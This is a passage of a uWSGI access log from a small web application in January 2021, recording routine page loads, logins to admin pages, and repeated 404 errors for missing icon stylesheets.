{38 vars in 845 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 478/691] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 479/692] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 480/693] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 481/694] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:36 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 482/695] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:36 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 483/696] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:36 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 484/697] 219.228.146.245 () {40 vars in 892 bytes} [Sat Jan 9 00:56:39 2021] GET /kind-manage/ => generated 10151 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 485/698] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 486/699] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 487/700] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 488/701] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 489/702] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 490/703] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 491/704] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:39 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 492/705] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:39 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 493/706] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:39 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 494/707] 219.228.146.245 () {48 vars in 972 bytes} [Sat Jan 9 00:56:46 2021] POST /kind-manage/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 495/708] 219.228.146.245 () {40 vars in 892 bytes} [Sat Jan 9 00:56:46 2021] GET /kind-manage/? => generated 11087 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 496/709] 219.228.146.245 () {40 vars in 891 bytes} [Sat Jan 9 00:56:46 2021] GET /kind-manage/ => generated 11087 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 497/710] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 498/711] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 499/712] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 500/713] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 501/714] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 502/715] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 503/716] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 504/717] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:46 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 505/718] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:46 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 506/719] 219.228.146.245 () {48 vars in 972 bytes} [Sat Jan 9 00:56:50 2021] POST /kind-manage/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 507/720] 219.228.146.245 () {40 vars in 892 bytes} [Sat Jan 9 00:56:50 2021] GET /kind-manage/? => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 508/721] 219.228.146.245 () {40 vars in 891 bytes} [Sat Jan 9 00:56:50 2021] GET /kind-manage/ => generated 12023 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 509/722] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 510/723] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 511/724] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 512/725] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 513/726] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 514/727] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 515/728] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 516/729] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:50 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 517/730] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:50 2021] GET /static/css/animate.css => generated 3430 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 518/731] 219.228.146.245 () {40 vars in 889 bytes} [Sat Jan 9 00:56:53 2021] GET /admin-home/ => generated 9586 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 519/732] 219.228.146.245 () {38 vars in 845 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 520/733] 219.228.146.245 () {38 vars in 833 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 521/734] 219.228.146.245 () {38 vars in 801 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 522/735] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 523/736] 219.228.146.245 () {38 vars in 837 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 524/737] 219.228.146.245 () {38 vars in 821 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 525/738] 219.228.146.245 () {38 vars in 877 bytes} [Sat Jan 9 00:56:53 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 526/739] 219.228.146.245 () {38 vars in 767 bytes} [Sat Jan 9 00:56:53 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 527/740] 219.228.146.245 () {38 vars in 769 bytes} [Sat Jan 9 00:56:53 2021] GET /static/css/spinners.css => generated 3433 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 528/741] 219.228.146.245 () {40 vars in 884 bytes} [Sat Jan 9 00:57:00 2021] GET /single/7/ => generated 8331 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 529/742] 219.228.146.245 () {38 vars in 825 bytes} [Sat Jan 9 00:57:15 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 530/743] 219.228.146.245 () {48 vars in 954 bytes} [Sat Jan 9 00:57:18 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 531/744] 219.228.146.245 () {40 vars in 871 bytes} [Sat Jan 9 00:57:18 2021] GET /home/ => generated 8646 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 532/745] 219.228.146.245 () {40 vars in 882 bytes} [Sat Jan 9 00:57:23 2021] GET /single-an-1 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 533/746] 219.228.146.245 () {40 vars in 884 bytes} [Sat Jan 9 00:57:23 2021] GET /single-an-1/ => generated 3045 bytes in 3 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 534/747] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 00:59:11 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 535/748] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 01:36:40 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 536/749] 219.228.146.62 () {36 vars in 716 bytes} [Sat Jan 9 01:55:26 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/750] 219.228.146.62 () {38 vars in 754 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/751] 219.228.146.62 () {38 vars in 776 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/752] 219.228.146.62 () {38 vars in 758 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/753] 219.228.146.62 () {38 vars in 756 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/754] 219.228.146.62 () {38 vars in 737 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/755] 219.228.146.62 () {38 vars in 762 bytes} [Sat Jan 9 01:55:26 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/756] 219.228.146.62 () {38 vars in 735 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/757] 219.228.146.62 () {38 vars in 753 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/758] 219.228.146.62 () {38 vars in 751 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/759] 219.228.146.62 () {38 vars in 743 bytes} [Sat Jan 9 01:55:26 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/760] 219.228.146.62 () {38 vars in 803 bytes} [Sat Jan 9 01:55:29 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/761] 219.228.146.62 () {38 vars in 772 bytes} [Sat Jan 9 01:55:29 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 537/762] 219.228.146.62 () {40 vars in 864 bytes} [Sat Jan 9 01:55:34 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 538/763] 219.228.146.62 () {40 vars in 866 bytes} [Sat Jan 9 01:55:34 2021] GET /my-admin/ => generated 5354 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /favicon.ico +[pid: 18965|app: 0|req: 539/764] 219.228.146.62 () {38 vars in 759 bytes} [Sat Jan 9 01:55:34 2021] GET /favicon.ico => generated 3397 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 540/765] 219.228.146.62 () {48 vars in 967 bytes} [Sat Jan 9 01:55:43 2021] POST /my-admin/ => generated 27 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 541/766] 219.228.146.62 () {40 vars in 921 bytes} [Sat Jan 9 01:55:43 2021] GET /admin-home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 0) +[pid: 18965|app: 0|req: 542/767] 219.228.146.62 () {40 vars in 923 bytes} [Sat Jan 9 01:55:44 2021] GET /admin-home/ => generated 9586 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/768] 219.228.146.62 () {38 vars in 868 bytes} [Sat Jan 9 01:55:44 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/769] 219.228.146.62 () {38 vars in 802 bytes} [Sat Jan 9 01:55:44 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/770] 219.228.146.62 () {38 vars in 814 bytes} [Sat Jan 9 01:55:44 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/771] 219.228.146.62 () {38 vars in 831 bytes} [Sat Jan 9 01:55:44 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/772] 219.228.146.62 () {38 vars in 843 bytes} [Sat Jan 9 01:55:44 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/773] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:44 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/774] 219.228.146.62 () {38 vars in 807 bytes} [Sat Jan 9 01:55:44 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/775] 219.228.146.62 () {38 vars in 783 bytes} [Sat Jan 9 01:55:44 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 18965|app: 0|req: 543/776] 219.228.146.62 () {38 vars in 881 bytes} [Sat Jan 9 01:55:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 18965|app: 0|req: 544/777] 219.228.146.62 () {38 vars in 893 bytes} [Sat Jan 9 01:55:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 545/778] 219.228.146.62 () {38 vars in 885 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 18965|app: 0|req: 546/779] 219.228.146.62 () {38 vars in 849 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 18965|app: 0|req: 547/780] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 18965|app: 0|req: 548/781] 219.228.146.62 () {38 vars in 869 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 18965|app: 0|req: 549/782] 219.228.146.62 () {38 vars in 925 bytes} [Sat Jan 9 01:55:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 18965|app: 0|req: 550/783] 219.228.146.62 () {38 vars in 817 bytes} [Sat Jan 9 01:55:46 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 18965|app: 0|req: 551/784] 219.228.146.62 () {38 vars in 815 bytes} [Sat Jan 9 01:55:46 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/785] 219.228.146.62 () {38 vars in 795 bytes} [Sat Jan 9 01:55:46 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/786] 219.228.146.62 () {38 vars in 871 bytes} [Sat Jan 9 01:55:46 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/787] 219.228.146.62 () {38 vars in 793 bytes} [Sat Jan 9 01:55:46 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/788] 219.228.146.62 () {38 vars in 867 bytes} [Sat Jan 9 01:55:46 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 552/789] 219.228.146.62 () {40 vars in 927 bytes} [Sat Jan 9 01:55:55 2021] GET /announcement => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 553/790] 219.228.146.62 () {40 vars in 929 bytes} [Sat Jan 9 01:55:55 2021] GET /announcement/ => generated 8250 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 18965|app: 0|req: 554/791] 219.228.146.62 () {38 vars in 885 bytes} 